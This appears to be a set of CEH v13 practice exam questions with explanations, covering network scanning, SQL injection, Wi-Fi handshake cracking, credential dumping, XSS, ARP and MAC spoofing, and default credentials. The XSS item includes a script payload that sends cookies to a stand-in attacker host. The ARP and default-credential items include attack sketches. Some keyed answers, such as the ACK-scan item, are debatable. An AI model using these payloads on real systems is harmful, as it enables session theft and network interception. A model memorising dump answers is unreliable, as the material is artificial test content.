ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 3 Q 41-60 


Question 41

An ethical hacker is conducting a penetration test and needs to identify live hosts on a network without triggering IDS/IPS systems. Which Nmap scan technique is most suitable for stealthy host discovery?

A) TCP SYN scan (-sS)

B) TCP Connect scan (-sT)

C) ICMP Echo scan (-PE)

D) TCP ACK scan (-sA)

Answer: D

Explanation:

When conducting stealthy reconnaissance during a penetration test, selecting the appropriate scanning technique is crucial to avoid detection by intrusion detection and prevention systems. The TCP ACK scan is particularly effective for stealthy host discovery and firewall rule mapping.

TCP ACK scan (-sA) sends TCP packets with only the ACK flag set. This technique is highly stealthy because ACK packets are typically part of established connections, making them less suspicious to security devices. Stateless firewalls and some IDS/IPS systems may not flag these packets as scanning attempts since they appear to be part of legitimate traffic. The scan helps determine firewall rules by analyzing responses: if a RST packet is received, the port is classified as “unfiltered,” while no response indicates the port is “filtered.” This information is valuable for understanding network security posture without raising alarms.

The scan operates by exploiting how firewalls handle different packet types. Since ACK packets are associated with established connections, many firewalls allow them through, providing insights into the network topology and filtering rules. This makes TCP ACK scanning particularly useful in the reconnaissance phase when stealth is paramount.

Why other options are incorrect:

A) TCP SYN scan is efficient and commonly called a “half-open” scan, but it’s more detectable than ACK scans. Most modern IDS/IPS systems are configured to detect SYN scanning patterns, as incomplete three-way handshakes are clear indicators of scanning activity.

B) TCP Connect scan completes the full three-way handshake, making it the loudest and most detectable scan type. It generates complete connection logs on target systems and is easily detected by security monitoring tools.

C) ICMP Echo scan sends ping requests, which are frequently blocked by firewalls and easily detected. Many networks disable ICMP responses, making this technique both noisy and often ineffective.

Question 42

A company’s web application is vulnerable to SQL injection attacks. Which of the following is the MOST effective defense mechanism to prevent SQL injection vulnerabilities?

A) Input validation using blacklisting

B) Parameterized queries with prepared statements

C) Web Application Firewall (WAF)

D) Encoding special characters in user input

Answer: B

Explanation:

SQL injection remains one of the most critical web application vulnerabilities, and implementing effective countermeasures is essential for application security. Parameterized queries with prepared statements represent the most robust and effective defense against SQL injection attacks.

Parameterized queries work by separating SQL code from user-supplied data. When using prepared statements, the SQL query structure is defined first with placeholders for user input, and then user data is bound to these placeholders separately. The database engine treats the bound parameters as pure data, never as executable SQL code, regardless of what characters or commands the data contains. This fundamental separation makes SQL injection technically impossible because malicious SQL syntax in user input cannot alter the query structure.

The database driver automatically handles proper escaping and type checking for parameters, eliminating human error in sanitization. This approach works consistently across different database systems and provides strong security guarantees. Modern programming frameworks and ORMs (Object-Relational Mapping tools) support parameterized queries natively, making implementation straightforward.

For example, instead of concatenating user input directly into SQL: "SELECT * FROM users WHERE username = '" + userInput + "'", a parameterized query uses: SELECT * FROM users WHERE username = ? with the user input bound separately as a parameter.
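As a minimal sketch of the contrast above (the table schema, user data, and payload are illustrative), Python's built-in sqlite3 module shows how a bound parameter neutralizes the same payload that breaks a concatenated query:

```python
import sqlite3

# In-memory database with one demo user (illustrative schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

malicious = "' OR '1'='1"  # classic injection payload

# Vulnerable: string concatenation lets the payload rewrite the query logic.
vulnerable = "SELECT * FROM users WHERE username = '" + malicious + "'"
print(conn.execute(vulnerable).fetchall())  # returns every row

# Safe: the ? placeholder binds the payload as pure data, never as SQL.
safe = "SELECT * FROM users WHERE username = ?"
print(conn.execute(safe, (malicious,)).fetchall())  # returns no rows
```

The same placeholder pattern carries over to other drivers (e.g. %s in psycopg2, named parameters in JDBC); the key property is that the query structure is fixed before any user data is attached.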

Why other options are incorrect:

A) Blacklisting is inherently weak because attackers can bypass filters using encoding, obfuscation, or alternative syntax. It’s impossible to anticipate all possible malicious inputs, and blacklists require constant updates.

C) WAF provides an additional security layer but shouldn’t be the primary defense. WAFs can be bypassed, may have false positives/negatives, and should complement secure coding practices rather than replace them.

D) Encoding special characters helps but doesn’t address the root cause. Sophisticated attacks can still bypass encoding, and this approach requires perfect implementation across all input points.

Question 43

During a wireless network assessment, an ethical hacker discovers a network using WPA2-PSK. Which attack method is most effective for compromising the pre-shared key?

A) Evil twin attack

B) Deauthentication attack followed by capturing the 4-way handshake

C) Jamming attack

D) Rogue access point attack

Answer: B

Explanation:

Compromising WPA2-PSK (Wi-Fi Protected Access 2 with Pre-Shared Key) networks requires capturing authentication credentials and performing offline cracking. The deauthentication attack followed by capturing the 4-way handshake is the most effective method for obtaining the necessary data to crack the pre-shared key.

The 4-way handshake is a critical authentication process that occurs when a client connects to a WPA2-PSK access point. During this handshake, the access point and client exchange four EAPOL (Extensible Authentication Protocol over LAN) frames that contain encrypted data derived from the PSK. Once captured, this handshake can be subjected to offline dictionary or brute-force attacks to recover the original password.

The deauthentication attack forcibly disconnects legitimate clients from the access point by sending spoofed deauthentication frames. This causes clients to automatically attempt reconnection, generating fresh 4-way handshakes that the attacker can capture using tools like Wireshark or airodump-ng. The captured handshake is then processed with tools like aircrack-ng, Hashcat, or John the Ripper, using wordlists or brute-force techniques to find the matching PSK.

This attack is effective because it exploits the authentication mechanism itself rather than attempting to break the encryption in real-time. The offline nature means the attacker can use unlimited computational resources without detection.

Why other options are incorrect:

A) Evil twin attacks create fake access points to trick users into connecting, but don’t directly crack the legitimate network’s PSK. They rely on social engineering rather than cryptographic attacks.

C) Jamming attacks cause denial of service by flooding frequencies with noise, but don’t provide any credentials or authentication data needed to access the network.

D) Rogue access points can intercept traffic from users who mistakenly connect, but don’t compromise the legitimate network’s PSK or provide access to the actual target network.

Question 44

An organization wants to implement a security control that monitors network traffic for malicious activity and can automatically block threats. Which solution should be deployed?

A) Intrusion Detection System (IDS)

B) Intrusion Prevention System (IPS)

C) Security Information and Event Management (SIEM)

D) Network Access Control (NAC)

Answer: B

Explanation:

Organizations need proactive security solutions that not only detect threats but can also automatically respond to prevent damage. An Intrusion Prevention System (IPS) is specifically designed to monitor network traffic for malicious activity and automatically block threats in real-time, making it the ideal solution for this requirement.

IPS devices are deployed inline with network traffic, meaning all packets must pass through the IPS before reaching their destination. This positioning allows the IPS to actively inspect traffic, identify malicious patterns or signatures, and immediately drop or block suspicious packets before they reach target systems. IPS combines detection capabilities with automated prevention actions, providing real-time protection against various threats including exploits, malware, DDoS attacks, and policy violations.

Modern IPS solutions use multiple detection methods: signature-based detection (matching known attack patterns), anomaly-based detection (identifying deviations from baseline behavior), and protocol analysis (detecting protocol violations). When threats are identified, the IPS can take various actions: dropping malicious packets, blocking the source IP address, resetting connections, or generating alerts for security teams.

The automated blocking capability is crucial—it eliminates the delay between threat detection and response, stopping attacks before damage occurs. This is particularly important for zero-day exploits and rapidly spreading threats where manual intervention would be too slow.
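The inline-versus-passive distinction can be sketched conceptually in a few lines (the signatures and string verdicts are purely illustrative, not a real detection engine):

```python
# Conceptual sketch of inline (IPS) vs passive (IDS) handling.
SIGNATURES = [b"/etc/passwd", b"' OR '1'='1"]  # toy signature list

def ips_inline(packet: bytes) -> str:
    """Inline device: a malicious packet is dropped before delivery."""
    if any(sig in packet for sig in SIGNATURES):
        return "DROP"      # blocked in real time, never reaches the target
    return "FORWARD"       # clean traffic passes through

def ids_passive(packet: bytes) -> str:
    """Passive device: sees only a copy, so it can alert but not block."""
    if any(sig in packet for sig in SIGNATURES):
        return "ALERT"     # the original packet already reached the target
    return "OK"
```

The structural difference is the return path: the IPS verdict decides whether the packet is delivered at all, while the IDS verdict arrives after delivery.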

Why other options are incorrect:

A) IDS only monitors and alerts on suspicious activity but cannot automatically block threats. It operates in passive mode, analyzing traffic copies, requiring manual intervention to stop attacks. This detection-only approach leaves a window of vulnerability.

C) SIEM systems collect, correlate, and analyze security logs from multiple sources for comprehensive visibility and compliance reporting. However, SIEM doesn’t directly monitor network packets or automatically block traffic—it’s primarily for analysis and investigation.

D) NAC controls which devices can access the network based on compliance and authentication policies, but doesn’t inspect traffic content for malicious activity or provide real-time threat blocking capabilities.

Question 45

A penetration tester needs to extract password hashes from a Windows system. Which tool is specifically designed for dumping credentials from Windows memory?

A) John the Ripper

B) Mimikatz

C) Hashcat

D) Hydra

Answer: B

Explanation:

Extracting credentials from compromised Windows systems is a critical post-exploitation technique used by penetration testers and ethical hackers to assess the extent of potential damage from a security breach. Mimikatz is the specialized tool designed specifically for dumping credentials, including password hashes, plaintext passwords, and Kerberos tickets from Windows memory.

Mimikatz was developed by Benjamin Delpy and has become the industry-standard tool for Windows credential extraction. It exploits the way Windows stores authentication credentials in the Local Security Authority Subsystem Service (LSASS) process memory. The tool can extract various types of credentials including NTLM hashes, Kerberos tickets (used in Golden Ticket and Silver Ticket attacks), plaintext passwords (when WDigest is enabled), and domain cached credentials.

The tool operates by reading memory from the LSASS process, which handles authentication on Windows systems. Mimikatz requires administrative or SYSTEM-level privileges to access this protected memory space. Once executed, it can dump credentials of all users who have logged into the system, including privileged accounts. This makes it invaluable for demonstrating lateral movement risks during penetration tests.

Mimikatz also includes functionality for pass-the-hash attacks, pass-the-ticket attacks, and privilege escalation. Security professionals use it to demonstrate the importance of proper credential management, privileged access management solutions, and endpoint protection.

Why other options are incorrect:

A) John the Ripper is a password cracking tool that works with already-extracted hashes. It doesn’t extract credentials from memory but rather attempts to crack hashes through dictionary attacks, brute-force, or rainbow tables.

C) Hashcat is another password cracking tool optimized for GPU acceleration. Like John the Ripper, it requires pre-extracted hashes and focuses on cracking rather than credential extraction from live systems.

D) Hydra is a network login cracker that performs brute-force attacks against network services like SSH, FTP, HTTP, and SMB. It doesn’t extract credentials from memory but attempts to guess passwords through network protocols.

Question 46

An ethical hacker discovers that a web application is vulnerable to Cross-Site Scripting (XSS). Which type of XSS occurs when malicious scripts are permanently stored on the target server?

A) Reflected XSS

B) Stored XSS

C) DOM-based XSS

D) Blind XSS

Answer: B

Explanation:

Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject malicious scripts into web applications, potentially compromising user data and sessions. Understanding the different types of XSS is crucial for effective security assessment and remediation. Stored XSS occurs when malicious scripts are permanently stored on the target server in databases, message forums, comment fields, or other persistent storage.

Stored XSS (also called Persistent XSS) is considered the most dangerous type of XSS because the malicious payload is saved on the server and automatically executed whenever users access the affected page. The attack doesn’t require victim interaction beyond visiting the compromised page, making it highly effective and potentially affecting many users.

Common scenarios include: comment sections where attackers post malicious scripts, user profile fields that display unsanitized input, forum posts, blog comments, or any feature where user input is stored and later displayed to other users. When a victim views the infected content, the browser executes the malicious script, believing it’s legitimate code from the trusted website.

The impact can be severe: session hijacking (stealing authentication cookies), credential theft through fake login forms, website defacement, redirecting users to malicious sites, installing malware, or performing actions on behalf of victims. The persistent nature means a single injection can compromise multiple users over extended periods.
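The standard remediation is output encoding at display time. A minimal sketch using Python's standard library (the comment payload and page markup are illustrative; real applications combine encoding with a templating engine's auto-escaping and a Content Security Policy):

```python
import html

# Attacker submits a comment containing a script payload (stored XSS).
comment = '<script>location="https://evil.example/?c="+document.cookie</script>'

# Rendering the raw stored comment would execute the script in every
# visitor's browser.
unsafe_page = "<div class='comment'>" + comment + "</div>"

# Output-encoding on display neutralizes the payload: the browser renders
# the markup characters as inert text instead of executing them.
safe_page = "<div class='comment'>" + html.escape(comment) + "</div>"
print(safe_page)
```

Because the payload sits in persistent storage, encoding must happen at every point where the stored value is written into a page, not just at the original input form.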

Why other options are incorrect:

A) Reflected XSS (Non-Persistent XSS) doesn’t store malicious code on the server. Instead, the payload is embedded in URLs or form submissions and immediately reflected back to users. It requires tricking victims into clicking malicious links.

C) DOM-based XSS occurs entirely client-side when JavaScript code processes user input unsafely without sending it to the server. The vulnerability exists in client-side code that dynamically modifies the DOM based on user input.

D) Blind XSS is a variant of Stored XSS where the attacker cannot see the results immediately. The payload is stored but executes in a different context (like admin panels), making detection challenging.

Question 47

During a security assessment, an ethical hacker needs to bypass Network Access Control (NAC) that uses MAC address filtering. Which technique would be most effective?

A) ARP poisoning

B) MAC address spoofing

C) DNS spoofing

D) IP address spoofing

Answer: B

Explanation:

Network Access Control (NAC) systems often implement MAC address filtering as a security measure to restrict network access to authorized devices. However, this security control can be bypassed through various techniques, with MAC address spoofing being the most direct and effective method.

MAC address spoofing involves changing the Media Access Control address of a network interface to impersonate an authorized device. Since MAC addresses operate at Layer 2 of the OSI model and are typically easy to modify through software, attackers can observe legitimate MAC addresses on the network and clone them to gain unauthorized access.

The attack process typically involves: first, using tools like Wireshark, airodump-ng, or netdiscover to capture and identify authorized MAC addresses on the network; second, disconnecting or waiting for an authorized device to disconnect; third, changing the attacker’s MAC address to match the authorized device using commands like ifconfig (Linux/Mac) or macchanger, or modifying registry settings (Windows); and finally, connecting to the network while presenting the spoofed MAC address.

This technique is particularly effective because MAC filtering provides only basic access control without strong authentication. Most operating systems allow MAC address modification without requiring special privileges, and NAC systems relying solely on MAC filtering have no mechanism to verify whether the device claiming a MAC address is the legitimate owner.
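A small sketch of the address-generation step (the interface name in the comments is hypothetical; in a real test the attacker would clone an observed authorized address rather than a random one):

```python
import random

def random_laa_mac() -> str:
    """Generate a random locally administered, unicast MAC address."""
    # In the first octet: set the locally-administered bit (0b10),
    # clear the multicast bit (0b01) so the address is valid for a host.
    first = (random.randint(0, 255) & 0b11111100) | 0b00000010
    rest = [random.randint(0, 255) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

# On Linux the chosen address would then be applied with, for example:
#   ip link set dev wlan0 down
#   ip link set dev wlan0 address <spoofed-mac>   # or: macchanger -m <spoofed-mac> wlan0
#   ip link set dev wlan0 up
print(random_laa_mac())
```

The ease of this change at the software level is exactly why MAC filtering cannot serve as an authentication mechanism.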

Why other options are incorrect:

A) ARP poisoning is used for man-in-the-middle attacks by associating the attacker’s MAC address with another device’s IP address, redirecting traffic. While useful for interception, it doesn’t bypass MAC filtering since the attacker still needs network access first.

C) DNS spoofing manipulates DNS responses to redirect traffic to malicious servers. This attack occurs after gaining network access and doesn’t address MAC-based access control restrictions at the network layer.

D) IP address spoofing involves falsifying the source IP address in packets. However, this doesn’t bypass MAC filtering since network switches and access points operate at Layer 2, making decisions based on MAC addresses before examining IP addresses.

Question 48

An organization implements a security measure where employees must provide two different authentication factors to access systems. Which authentication combination represents two-factor authentication?

A) Password and PIN

B) Password and security question

C) Password and fingerprint scan

D) Password and username

Answer: C

Explanation:

Multi-factor authentication (MFA) significantly enhances security by requiring users to provide multiple forms of verification. True two-factor authentication requires combining two different types of authentication factors from separate categories, making password and fingerprint scan the correct implementation.

Authentication factors are categorized into three main types: something you know (knowledge factors like passwords, PINs, security questions), something you have (possession factors like smart cards, tokens, mobile devices), and something you are (inherence factors like biometrics including fingerprints, facial recognition, iris scans, voice patterns).

The password and fingerprint combination provides strong security because it combines two different factor types: a knowledge factor (password – something you know) and a biometric factor (fingerprint – something you are). This means an attacker would need to both know the password and have access to the user’s physical biometric characteristics, significantly increasing security beyond single-factor authentication.

Biometric authentication offers unique advantages: it’s difficult to steal, forget, or transfer; provides non-repudiation since biometrics are inherently tied to individuals; and cannot be easily guessed like passwords. When combined with passwords, this creates a robust security posture where compromising one factor alone is insufficient for unauthorized access.

The implementation typically requires users to enter their password first, then verify their identity through fingerprint scanning using specialized readers or mobile device sensors.

Why other options are incorrect:

A) Password and PIN are both knowledge factors (something you know). Using two factors from the same category doesn’t constitute true two-factor authentication—it’s merely two-step verification using a single factor type, providing minimal additional security.

B) Password and security questions are also both knowledge factors. Security questions are often weaker than passwords since answers may be discoverable through social engineering or public information on social media.

D) Username is not an authentication factor—it’s an identifier that specifies which account is being accessed. Usernames are typically public or semi-public information and provide no security value in authentication.

Question 49

A penetration tester wants to perform a man-in-the-middle attack on a local network to intercept traffic between two hosts. Which technique involves poisoning the ARP cache of target systems?

A) DNS cache poisoning

B) ARP spoofing

C) Session hijacking

D) IP spoofing

Answer: B

Explanation:

Man-in-the-middle (MITM) attacks on local networks exploit fundamental protocols to intercept communications between hosts. ARP spoofing (also called ARP poisoning or ARP cache poisoning) is the primary technique used to position an attacker between two communicating parties on a Local Area Network.

ARP (Address Resolution Protocol) is used to map IP addresses to MAC addresses on local networks. When a device needs to communicate with another device on the same network, it broadcasts an ARP request asking “Who has IP address X?” The device with that IP responds with its MAC address, and this mapping is cached in the ARP table for efficiency.

ARP spoofing exploits the stateless nature of ARP—devices accept ARP replies even without sending requests, and there’s no authentication mechanism. The attacker sends forged ARP replies to target hosts, associating the attacker’s MAC address with the IP address of another device (typically the gateway). This causes victims to send traffic intended for the legitimate destination to the attacker instead.

The attack typically involves sending crafted ARP replies to both the victim and the gateway, making each believe the attacker’s MAC address belongs to the other party. All traffic flows through the attacker, who can inspect, modify, or forward it to maintain the connection. Tools like Ettercap, arpspoof, and Bettercap automate this process.
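The forged reply itself is a simple 28-byte structure. A sketch that builds one with Python's struct module (the MAC and IP values are hypothetical; tools like arpspoof wrap this payload in an Ethernet frame and transmit it repeatedly to keep the victim's cache poisoned):

```python
import struct

def arp_reply(sender_mac: bytes, sender_ip: bytes,
              target_mac: bytes, target_ip: bytes) -> bytes:
    """Build a raw ARP reply claiming sender_ip lives at sender_mac."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # htype: Ethernet
        0x0800,   # ptype: IPv4
        6, 4,     # hardware / protocol address lengths
        2,        # opcode 2 = reply (unsolicited, but victims cache it anyway)
        sender_mac, sender_ip,   # attacker's MAC paired with the gateway's IP
        target_mac, target_ip,   # the victim being poisoned
    )

attacker_mac = bytes.fromhex("aabbccddeeff")   # hypothetical attacker NIC
gateway_ip   = bytes([192, 168, 1, 1])
victim_mac   = bytes.fromhex("112233445566")
victim_ip    = bytes([192, 168, 1, 50])

pkt = arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
print(len(pkt))  # 28-byte ARP payload, ready to wrap in an Ethernet frame
```

Because the protocol carries no authenticity field anywhere in those 28 bytes, the only defenses are external: static ARP entries, dynamic ARP inspection on switches, or encryption above Layer 2.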

Why other options are incorrect:

A) DNS cache poisoning corrupts DNS resolver caches to redirect domain name queries to malicious IP addresses. This operates at a higher layer and doesn’t involve ARP or direct Layer 2 interception on local networks.

C) Session hijacking involves taking over an established session between a user and server, typically by stealing session tokens or cookies. While it may follow MITM positioning, it’s not the technique for achieving MITM status.

D) IP spoofing falsifies source IP addresses in packets but doesn’t enable bidirectional MITM attacks on local networks. Responses would still go to the legitimate IP address unless combined with other techniques.

Question 50

An ethical hacker is conducting a social engineering assessment and sends emails that appear to come from a trusted source within the organization. What type of attack is being performed?

A) Phishing

B) Whaling

C) Spear phishing

D) Vishing

Answer: C

Explanation:

Social engineering attacks exploit human psychology rather than technical vulnerabilities. When an ethical hacker sends targeted emails appearing to come from trusted sources within an organization, this represents spear phishing, a sophisticated and highly effective attack method.

Spear phishing is a targeted form of phishing that focuses on specific individuals or organizations using personalized information to increase credibility and success rates. Unlike generic phishing campaigns sent to thousands of random recipients, spear phishing involves research and customization. Attackers gather information about targets through social media, company websites, public records, and other sources to craft convincing messages that reference specific projects, colleagues, organizational structure, or internal processes.

The emails in spear phishing attacks typically impersonate trusted entities—executives, IT departments, HR personnel, or business partners. They may use domain spoofing, compromised accounts, or look-alike domains to appear legitimate. The content often creates urgency (“Your account will be locked unless you verify credentials”) or appeals to authority (“The CEO needs this information immediately”) to bypass rational decision-making.

The goal varies: stealing credentials through fake login pages, installing malware via malicious attachments, initiating fraudulent wire transfers, or extracting sensitive information. Spear phishing is particularly dangerous because personalization makes detection difficult—emails appear contextually appropriate, making recipients less suspicious.

Organizations are vulnerable because security awareness training often focuses on generic phishing indicators, while spear phishing emails may lack obvious red flags like grammatical errors or suspicious sender addresses when properly crafted.

Why other options are incorrect:

A) Phishing is a broad term for fraudulent communications (usually emails) attempting to steal sensitive information or install malware. Generic phishing campaigns are untargeted, sent to large numbers of recipients with the same message, lacking personalization.

B) Whaling is a specific subset of spear phishing that targets high-profile individuals like executives, board members, or celebrities. While it uses similar techniques, whaling specifically focuses on “big fish” rather than general employees.

D) Vishing (voice phishing) uses telephone calls rather than emails to manipulate victims into revealing information or performing actions. It’s a different attack vector entirely, though it may be combined with email-based attacks.

Question 51

A security analyst discovers that an attacker has gained unauthorized access to a system and created a backdoor for persistent access. Which phase of the Cyber Kill Chain does this activity represent?

A) Reconnaissance

B) Weaponization

C) Installation

D) Command and Control

Answer: C

Explanation:

The Cyber Kill Chain, developed by Lockheed Martin, is a framework that describes the stages of a cyber attack from reconnaissance to data exfiltration. Understanding each phase helps security professionals identify and disrupt attacks at various stages. The Installation phase occurs when attackers establish persistent access to compromised systems by installing backdoors, rootkits, or other malware.

Installation represents a critical turning point in an attack where temporary access becomes permanent. After successfully exploiting vulnerabilities and gaining initial access (Exploitation phase), attackers need mechanisms to maintain their foothold even after system reboots, credential changes, or detection of the initial exploit. Backdoors serve this purpose by creating alternative entry points that bypass normal authentication mechanisms.

Common installation techniques include: creating hidden user accounts with administrative privileges, modifying system startup scripts to launch malicious code automatically, installing remote access trojans (RATs) that connect back to attacker-controlled servers, placing webshells on compromised web servers, modifying system binaries or libraries, or exploiting scheduled tasks and services for persistence.

The backdoor may use various persistence mechanisms: Windows Registry modifications, scheduled tasks, service creation, DLL hijacking, or startup folder placement. Sophisticated attackers employ rootkit techniques to hide their presence from security tools and system administrators, making detection challenging.

This phase is crucial for defenders to understand because successful installation significantly increases the cost and difficulty of remediation—simply patching the initial vulnerability becomes insufficient once persistent backdoors exist.

Why other options are incorrect:

A) Reconnaissance is the initial phase where attackers gather information about targets through passive and active techniques. No system access or compromise occurs during reconnaissance—it’s purely information gathering.

B) Weaponization involves preparing attack tools by coupling exploits with payloads (like malware) to create deliverable packages. This occurs before attempting compromise and doesn’t involve access to target systems.

D) Command and Control (C2) is the phase after installation where attackers establish communication channels to remotely control compromised systems. While backdoors facilitate C2, the act of creating and installing the backdoor itself belongs to the Installation phase.

Question 52

An organization wants to test its incident response procedures and employee awareness without causing actual damage or disruption. Which type of security assessment should be conducted?

A) Vulnerability assessment

B) Penetration test

C) Red team exercise

D) Tabletop exercise

Answer: D

Explanation:

Organizations need to regularly test their security preparedness, but not all testing methods involve technical attacks or system disruption. A tabletop exercise provides a discussion-based approach to evaluate incident response procedures and employee awareness without causing actual damage or operational disruption.

Tabletop exercises are structured discussion sessions where key personnel walk through simulated security incident scenarios in a controlled, low-pressure environment. Participants include incident response team members, management, IT staff, legal counsel, public relations, and other relevant stakeholders who would be involved in actual incident response.

During the exercise, a facilitator presents a realistic scenario—such as ransomware infection, data breach, DDoS attack, or insider threat—and asks participants to describe how they would respond. The discussion covers: initial detection and assessment, escalation procedures, communication protocols (internal and external), containment strategies, evidence preservation, recovery processes, legal obligations, and public disclosure requirements.

The primary benefits include: identifying gaps in incident response plans, clarifying roles and responsibilities, improving coordination between departments, testing communication channels, validating decision-making processes, ensuring documentation completeness, and building team familiarity with procedures—all without any risk to production systems or data.

Tabletop exercises are cost-effective, can be conducted regularly (quarterly or semi-annually), and provide valuable learning opportunities. They complement technical security assessments by focusing on human and procedural elements that technical tests don’t address.

Why other options are incorrect:

A) Vulnerability assessments use automated tools to scan systems for known vulnerabilities, misconfigurations, and security weaknesses. While non-disruptive, they don’t test incident response procedures or employee awareness—they focus on identifying technical flaws.

B) Penetration tests involve actively exploiting vulnerabilities to determine how far attackers could penetrate systems. These are technical assessments that may cause disruption and don’t primarily test incident response procedures or awareness.

C) Red team exercises simulate real-world attacks using adversarial tactics to test detection and response capabilities. While valuable, they involve actual attempts to compromise systems and may cause disruption, making them unsuitable for testing without potential impact.

Question 53

A web application stores session identifiers in URLs instead of secure cookies. Which vulnerability does this implementation create?

A) Cross-Site Request Forgery (CSRF)

B) Session fixation

C) Session hijacking through URL exposure

D) SQL injection

Answer: C

Explanation:

Proper session management is critical for web application security. When applications store session identifiers in URLs rather than secure cookies, they create significant vulnerability to session hijacking through URL exposure, compromising user authentication and confidentiality.

Session identifiers in URLs appear as parameters in the query string, for example: https://example.com/dashboard?sessionid=abc123xyz. This implementation method creates multiple attack vectors that expose session tokens to unauthorized parties.

The primary security issues include: URL sharing—users may inadvertently share links containing their session IDs via email, messaging, or social media, giving recipients full access to their authenticated session; browser history—session IDs stored in browser history remain accessible even after logout, allowing anyone with physical access to the computer to hijack sessions; referrer header leakage—when users click external links, the entire URL (including session ID) may be transmitted in the HTTP Referer header to third-party websites; server logs—web servers and proxy servers log complete URLs, exposing session IDs to anyone with log access; browser bookmarks—users may bookmark pages with session IDs, creating persistent authentication bypass opportunities.
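By contrast, delivering the identifier in a hardened cookie keeps it out of the query string, browser history, and Referer headers. A minimal sketch using Python's standard `http.cookies` module (the cookie name and token value are illustrative):

```python
from http.cookies import SimpleCookie

# Build a Set-Cookie header for the session token. Attribute names follow
# RFC 6265; the session value here is a placeholder for a server-generated
# random token.
cookie = SimpleCookie()
cookie["sessionid"] = "abc123xyz"
cookie["sessionid"]["httponly"] = True      # not readable by JavaScript
cookie["sessionid"]["secure"] = True        # sent only over HTTPS
cookie["sessionid"]["samesite"] = "Strict"  # withheld on cross-site requests
cookie["sessionid"]["path"] = "/"

header = cookie.output(header="Set-Cookie:")
print(header)
```

The HttpOnly and Secure flags address token theft via script injection and plaintext interception, while SameSite limits cross-site leakage, none of which URL-based session IDs can offer.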

Attackers gaining access to session IDs can impersonate legitimate users without knowing passwords, accessing sensitive data, performing unauthorized transactions, or modifying account information. The impact is severe because session hijacking bypasses authentication entirely.

Why other options are incorrect:

A) CSRF exploits authenticated sessions to perform unauthorized actions, but the vulnerability stems from lack of anti-CSRF tokens and validation, not from where session IDs are stored. URL-based sessions don’t inherently cause CSRF.

B) Session fixation involves forcing a known session ID onto victims before authentication. While URL-based sessions may facilitate this, the primary vulnerability described is exposure of existing valid session IDs rather than fixation attacks.

D) SQL injection involves injecting malicious SQL code through input fields to manipulate database queries. Session ID storage location doesn’t directly relate to SQL injection vulnerabilities, which stem from improper input validation and parameterization.

Question 54

An ethical hacker discovers that a network device has default credentials that were never changed. Which vulnerability category does this represent?

A) Zero-day vulnerability

B) Misconfiguration

C) Buffer overflow

D) Race condition

Answer: B

Explanation:

Security vulnerabilities arise from various sources, including software bugs, design flaws, and human errors. Default credentials that remain unchanged represent a misconfiguration vulnerability, one of the most common and easily exploitable security weaknesses in IT environments.

Misconfiguration vulnerabilities occur when security settings, configurations, or hardening procedures are inadequately implemented, leaving systems in insecure default states. Default credentials specifically refer to manufacturer-set usernames and passwords (like admin/admin, root/root, or admin/password) that are intended for initial setup but should be changed immediately upon deployment.

The security risk is severe because: default credentials are publicly documented in product manuals and online databases, making them easily accessible to attackers; automated scanning tools and botnets specifically target devices with default credentials; successful authentication provides immediate administrative access without requiring sophisticated exploitation techniques; and many IoT devices, routers, network appliances, and industrial control systems ship with default credentials that users frequently neglect to change.

Attackers exploit this misconfiguration through simple credential testing against internet-exposed devices. The Mirai botnet famously leveraged default credentials to compromise hundreds of thousands of IoT devices, creating massive DDoS capabilities. Similar attacks continue targeting security cameras, routers, NAS devices, and building management systems.
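The credential-testing logic involved is trivially simple, which is part of why the attack scales. A hypothetical sketch of such a sweep, with the login attempt injected as a callable so the logic can be shown without contacting a real device (all names, addresses, and credential pairs are illustrative):

```python
# Common factory credential pairs; real wordlists are much longer.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "root"),
    ("user", "user"),
]

def sweep_defaults(host, try_login, creds=DEFAULT_CREDS):
    """Return the first default username/password pair accepted by
    `try_login(host, user, pw)`, or None if the device rejects them all."""
    for username, password in creds:
        if try_login(host, username, password):
            return (username, password)
    return None

# Simulated device that still uses the factory admin/admin account.
def fake_device_login(host, username, password):
    return (username, password) == ("admin", "admin")

hit = sweep_defaults("192.0.2.10", fake_device_login)
print(hit)  # ('admin', 'admin') -> the device accepted factory credentials
```

Botnets like Mirai run essentially this loop against millions of internet-exposed IPs, which is why mandatory first-boot password changes are such an effective countermeasure.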

Prevention requires: mandatory password changes during initial setup, regular security audits scanning for default credentials, security baselines enforcing proper configuration, and security awareness training emphasizing hardening procedures.

Why other options are incorrect:

A) Zero-day vulnerabilities are previously unknown software flaws without available patches. Default credentials are neither unknown nor software bugs—they’re intentional design choices that users fail to change, representing configuration issues rather than undisclosed vulnerabilities.

C) Buffer overflow vulnerabilities occur when programs write data beyond allocated memory boundaries, potentially allowing arbitrary code execution. These are software coding errors unrelated to credential management or configuration practices.

D) Race conditions are timing-dependent software bugs where program behavior depends on the sequence or timing of uncontrollable events. They’re concurrency issues in code logic, completely different from configuration-related security weaknesses.

Question 55

During a penetration test, an ethical hacker successfully exploits a vulnerability and gains low-privileged access to a system. What is the next phase typically performed to gain higher-level access?

A) Lateral movement

B) Privilege escalation

C) Data exfiltration

D) Covering tracks

Answer: B

Explanation:

Penetration testing follows a methodology that mirrors real-world attack progression. After gaining initial access with limited privileges, the next critical step is privilege escalation, which involves elevating access rights from a low-privileged user to administrator or system-level privileges.

Privilege escalation is essential because initial compromise often provides only basic user access with significant restrictions: limited file system access, inability to install software, restrictions on viewing sensitive data, and inability to modify system configurations. Administrative privileges are required to fully assess potential damage, access critical assets, install persistent backdoors, and demonstrate the complete security impact.

Privilege escalation occurs through two main categories: vertical privilege escalation (gaining higher-level access on the same system, like standard user to administrator) and horizontal privilege escalation (accessing resources of another user at the same privilege level).

Common techniques include: exploiting unpatched kernel vulnerabilities, leveraging misconfigured services running with elevated privileges, exploiting weak file permissions on sensitive configuration files, abusing sudo misconfigurations on Linux systems, exploiting scheduled tasks running as SYSTEM on Windows, using stored credentials in files or memory, exploiting DLL hijacking or path interception vulnerabilities, and leveraging token manipulation or impersonation privileges.
